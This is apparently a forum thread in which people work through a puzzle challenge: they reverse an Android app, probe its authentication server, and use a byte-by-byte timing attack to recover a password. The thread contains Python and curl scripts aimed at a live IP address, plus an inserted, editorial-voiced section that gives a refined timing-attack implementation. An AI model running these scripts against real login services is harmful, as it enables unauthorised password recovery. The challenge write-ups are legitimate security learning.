Poke around and you'll find code for POSTing JSON-encoded credentials to http://35.246.158.51:8070/auth/getUrl. (Grep for the IP to find it.)
So, using the web site name as the seed and the 'client id' as the password, we get:
$ curl -X POST -H "Content-Type: application/json" -d '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' http://35.246.158.51:8070/auth/getUrl
The response is an HTTP 200 and: {"AuthURL":"/auth/v2"}
http://35.246.158.51:8070/auth/v2 is, I guess, the next step.
Edit: the /auth/getUrl endpoint responds to any request with the same response, so that may not be the right Seed/Password combination.
I haven't yet figured out what those are though...
See:
    Future<Token> login(String seed, String password) {
      var headers = new Map<String,String>();
      return _netUtil.get(LOGIN_URL, headers:headers).then((dynamic authUrl) {
        try {
          if (authUrl == null) {
            return Future<Token>.sync(() => new Token("", false, 0));
          }
          var loginUrl = BASE_URL + AuthURL.map(json.decode(authUrl.body)).url;

This leads me to believe that the seed and password entered in development / in the cookie jar from a previous attempt are somewhere in the `isolate_snapshot_data` file.
[0] https://github.com/flutter/flutter/wiki/Flutter-engine-opera...
First of all, as per the code, the User-Agent must be set to "iWalk-v2".
Then doing a simple GET request to http://35.246.158.51:8070 will return {"AuthURL":"/auth/v2"}.
Replacing the original URL with http://35.246.158.51:8070/auth/v2 and then sending JSON like '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' with "Content-Type: application/json" returns {"IsValid":false,"LockURL":"","Time":136764}.
The Time here (as per my understanding of the code) is the request duration, which somehow contradicts Postman's request duration field.
Now, one weird thing I've noticed about this app: if I install it on a regular device, connect it to a proxy, then type gibberish into the fields and click Login, the following code gets invoked:

    void _submit() async {
      final form = formKey.currentState;
      if (form.validate()) {
        setState(() => _isLoading = true);
        form.save();
        _networkActions.login(_seed, _password)
            .then((result) => _loginCompleted(result))
            .catchError((e) {
          _loginCompleted(new Token("", false, 0));
        });
      }
    }

If a loading icon appears, then I assume the code passed the condition and executed this line: "setState(() => _isLoading = true);". Now the weird part is that I don't see any outgoing connections from the app... (I use Charles to capture requests.)

"Welcome Agent.
A team of field operatives is currently on-site in enemy territory, working to retrieve intel on an imminent terrorist attack.
The intel is contained in a safe, the plans for which are available to authorized clients via an app [0].
Our client ID is d09ff4ec651c48f89f7f7aa19160bd55
Your mission is to retrieve those plans, and allow our team to break into the safe.
Good luck!,
M."
[0]: http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk

You could always install it on a virtual phone in a sandboxed VM.
Challenge-1: Link http://3d375032374147a7865753e4bbc92682.xyz / http://35.246.158.51
Download app.apk from http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk. Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c. You will use it as the "Seeder" property in the app.

Using Wireshark (or any other packet sniffer) we can see that the login button does this:

    POST /auth/v2 HTTP/1.1
    user-agent: iWalk-v2
    content-type: application/json; charset=utf-8
    accept-encoding: gzip
    content-length: 29
    host: 35.246.158.51:8070

    {"Seed":"admin","Password":"admin "}

    HTTP/1.1 200 OK
    Content-Type: application/json
    Date: Wed, 08 May 2019 21:49:05 GMT
    Content-Length: 47

    {"IsValid":false,"LockURL":"","Time":149646302}

Using http://www.javadecompilers.com/, I decompiled the apk and got a look at the Manifest:

    <?xml version="1.0" encoding="utf-8" .......
    <activity android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize" android:hardwareAccelerated="true" android:launchMode="singleTop" android:name="com.iwalk.locksmither.MainActivity" .... .....

The line "look for us on github.com" got my attention, so I looked for iwalk.locksmither on GitHub and found "iwalk-locksmithers", link: https://github.com/iwalk-locksmithers-app. The server source code was there. In the code, there are a few comments that can help.
https://github.com/iwalk-locksmithers-app/server/blob/master... line 70 points us to the auth-1 weakness.
The part:

    for currentIndex < len(lock.Password) && currentIndex < len(loginData.Password) {
        if lock.Password[currentIndex] != loginData.Password[currentIndex] {
            break
        }
        //OG: securing against bruteforce attempts... ;-)
        time.Sleep(30 * time.Millisecond)
        currentIndex++
    }

The "securing against bruteforce" (trying all combinations) is the weakness. The idea behind hacking the password is to try only one char at first. If we get a 30ms delay, it means we got the 1st char right, so then we can check the next one: we try 2 chars (the 1st we know, the second we guess). If we get a 60ms +- delay, then we got the 2nd char and we try the third one, and again and again, until we get the password.
To solve it, I wrote a simple C# program that, in a loop, does an HTTP POST to the server every time we try to add a new char to the password, and if we get a delay that is +- 30ms more than the last try, we add that char to our final password. The URI is http://35.246.158.51:8070/auth/v1_1 and the user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as written in the server). I did some average calculations of the delays. The password length is 32 with hex chars (I didn't know that until I guessed the password). We know the password is correct when we get back "IsValid":true. *The Time we get is in nanoseconds and not ms.
After I entered the password and client id, I got a link for a token and a link for challenge 2:
http://759d8eba52184f538c8a4525680cfb33.xyz/
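Added example, not the write-up author's C# tool and not the challenge server's code: a Python simulation of the byte-by-byte timing attack described in the write-up above. The server side is a constructed stand-in that reproduces the quoted Go loop (one 30 ms sleep per matching byte, the comparison stopping at the first mismatch, Time reported in nanoseconds) with made-up jitter and occasional outliers; that noise is what makes a single measurement per candidate ambiguous, which is the "several characters look slow" problem the scripts later in the thread ran into. The secret, the seed value, the hex alphabet and the noise model are all assumptions. The attack takes the median of several samples per candidate and only extends the known prefix when the best candidate actually gains a full sleep step over the previous position.

```python
import random
import statistics

# Constructed simulation parameters (assumptions, not values from the challenge).
SECRET_PASSWORD = "3f9a1c"        # constructed secret; the real one was 32 hex chars
SLEEP_PER_CHAR_NS = 30_000_000    # time.Sleep(30 * time.Millisecond), in nanoseconds
HEX_ALPHABET = "0123456789abcdef"
JITTER_MAX_NS = 20_000_000        # ordinary per-request noise, constructed
OUTLIER_RATE = 0.03               # fraction of requests that get a big extra delay
MARGIN_NS = 5_000_000             # accept a step only if it clears 30 ms minus this


def vulnerable_login(seed: str, password: str, rng: random.Random) -> dict:
    """Stand-in for /auth/v1_1 with the quoted comparison loop.

    Returns the response shape seen in the thread: IsValid, LockURL and Time,
    where Time is the handler's duration in nanoseconds. The clock is simulated
    (no real sleep) so the attack runs offline and deterministically.
    The seed is accepted only to mirror the request shape.
    """
    matched = 0
    for secret_byte, guess_byte in zip(SECRET_PASSWORD, password):
        if secret_byte != guess_byte:
            break                      # the Go loop breaks before sleeping on a mismatch
        matched += 1
    elapsed_ns = matched * SLEEP_PER_CHAR_NS
    # Constructed jitter plus an occasional outlier, to show why one sample
    # per candidate is not enough.
    elapsed_ns += rng.randint(0, JITTER_MAX_NS)
    if rng.random() < OUTLIER_RATE:
        elapsed_ns += rng.randint(0, 80_000_000)
    return {"IsValid": password == SECRET_PASSWORD, "LockURL": "", "Time": elapsed_ns}


def median_time_ns(seed: str, guess: str, rng: random.Random, samples: int) -> int:
    """Median of several measurements; additive outliers cannot drag it up
    unless they hit more than half of the samples."""
    times = [vulnerable_login(seed, guess, rng)["Time"] for _ in range(samples)]
    return int(statistics.median(times))


def recover_password(seed: str, rng: random.Random, alphabet: str = HEX_ALPHABET,
                     max_len: int = 32, samples: int = 9):
    """Extend the known prefix one byte at a time.

    For each position, every candidate byte is measured `samples` times and the
    one with the highest median Time wins, but only if that median is about one
    full sleep step above the previous position. Returns the password, or None
    if no candidate gains a step (next byte not in the alphabet, or too noisy).
    """
    known = ""
    for position in range(max_len):
        best_char, best_ns = None, -1
        for candidate in alphabet:
            guess = known + candidate
            if vulnerable_login(seed, guess, rng)["IsValid"]:
                return guess                       # the server confirms the full password
            t = median_time_ns(seed, guess, rng, samples)
            if t > best_ns:
                best_char, best_ns = candidate, t
        expected_ns = (position + 1) * SLEEP_PER_CHAR_NS
        # A wrong byte never sleeps for this position, so its median stays
        # below expected_ns - MARGIN_NS unless most samples were outliers.
        if best_ns < expected_ns - MARGIN_NS:
            return None
        known += best_char
    return None


if __name__ == "__main__":
    print(recover_password("example-seed", random.Random(1)))
```

The per-candidate median rather than a single request is the important design choice: with additive network noise, an outlier can make any one request look like a hit, but it takes more than half of the samples being outliers to move the median. The threshold check at the end of each position stops the attack from silently committing to a wrong byte when no candidate actually gained a step.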
Challenge-2 http://759d8eba52184f538c8a4525680cfb33.xyz/
    import requests
    import string

    #a-zA-Z!@#$%^&*()_-=
    printables_chars = string.printable
    agent = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'
    for i, char in enumerate(printables_chars):
        print('run {}. char {}'.format(i, char))
        # the endpoint expects a JSON body and the server-side User-Agent
        result = requests.post('http://35.246.158.51:8070/auth/v1_1',
                               json={"Seed": "d14236b60e0f4aef94499cb648a5f522", "Password": char},
                               headers={'User-Agent': agent})
        if result.json()['Time'] > 100000000:
            # This prints randomly for some cases and others doesn't
            print(result.json()['Time'])

    import requests

    CHARACTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|\\/?,.<>`~"
    URL = "http://35.246.158.51:8070/auth/v1_1"
    HEADERS = {'User-Agent': 'ed9ae2c0-9b15-4556-a393-23d500675d4b', 'content-type': 'application/json; charset=utf-8'}
    PAYLOAD = {}
    for i in range(len(CHARACTERS)):
        PAYLOAD['Seed'] = "6711d2ec0d724396ad1570fcfb431443"
        PAYLOAD['Password'] = "" + CHARACTERS[i]
        r = requests.post(url=URL, json=PAYLOAD, headers=HEADERS)
        result = r.json()
        delay = result['Time']
        print(str(PAYLOAD) + " - " + str(delay))

But for the first character I don't see a really huge DELAY in the response; I always have a few characters with a big delay and not only one.

But I got some progress:
1. The image leads to a subdomain: http://dev.missilesys.com/
2. It generates a p12 certificate for login to the admin panel. You should enter username/password, submit the form and click download. (If there is no download button, just try something like this: refresh the page, change the method from POST to GET, enter credentials and press Submit; after that press Submit again and it'll appear.)
3. Add the certificate to the Keychain (on macOS) and go to missilesys.com.
4. You've got into the admin panel, but you have no permissions to shut it down. You need to be an administrator.
5. You should get a .p12 certificate for the administrator, but you can't because "User already exists!". This is where I'm stuck.
It would be great if you have an idea how to handle it :)
1. Access $("#text1")[0].innerHTML
2. $( document ).ready() { typeWriter (); }
facepalm
Why not upload a plain text file in the first place?
Remember, this thing'll be getting picked apart by everybody considering the source.
Unless you're afraid of getting black bagged that i...<SIGNAL LOST>
You need to figure out the address of the site I posted from the picture. (Not that difficult)
Does curiosity really make y'all this dumb?
As an ip address, 35.246.158.51 leads to the site OP posted.
The challenges usually involve static analysis / disassembly, breaking improperly configured crypto, etc. The best part (for me at least) is that competitors must submit a write-up of how they cracked the challenge, and the best write-ups are published. It makes for fascinating reading even if you’re not really into that scene.
https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=P...
On page 397 there is an entry in the index: "iWalk, v2 71". On the same page there are interesting terms like Islamic terrorism, jihad via internet, Judaism... Also, the page number 71 that stands next to the iWalk term is an interesting coincidence, since this riddle is celebrating 71 years of Israel's independence...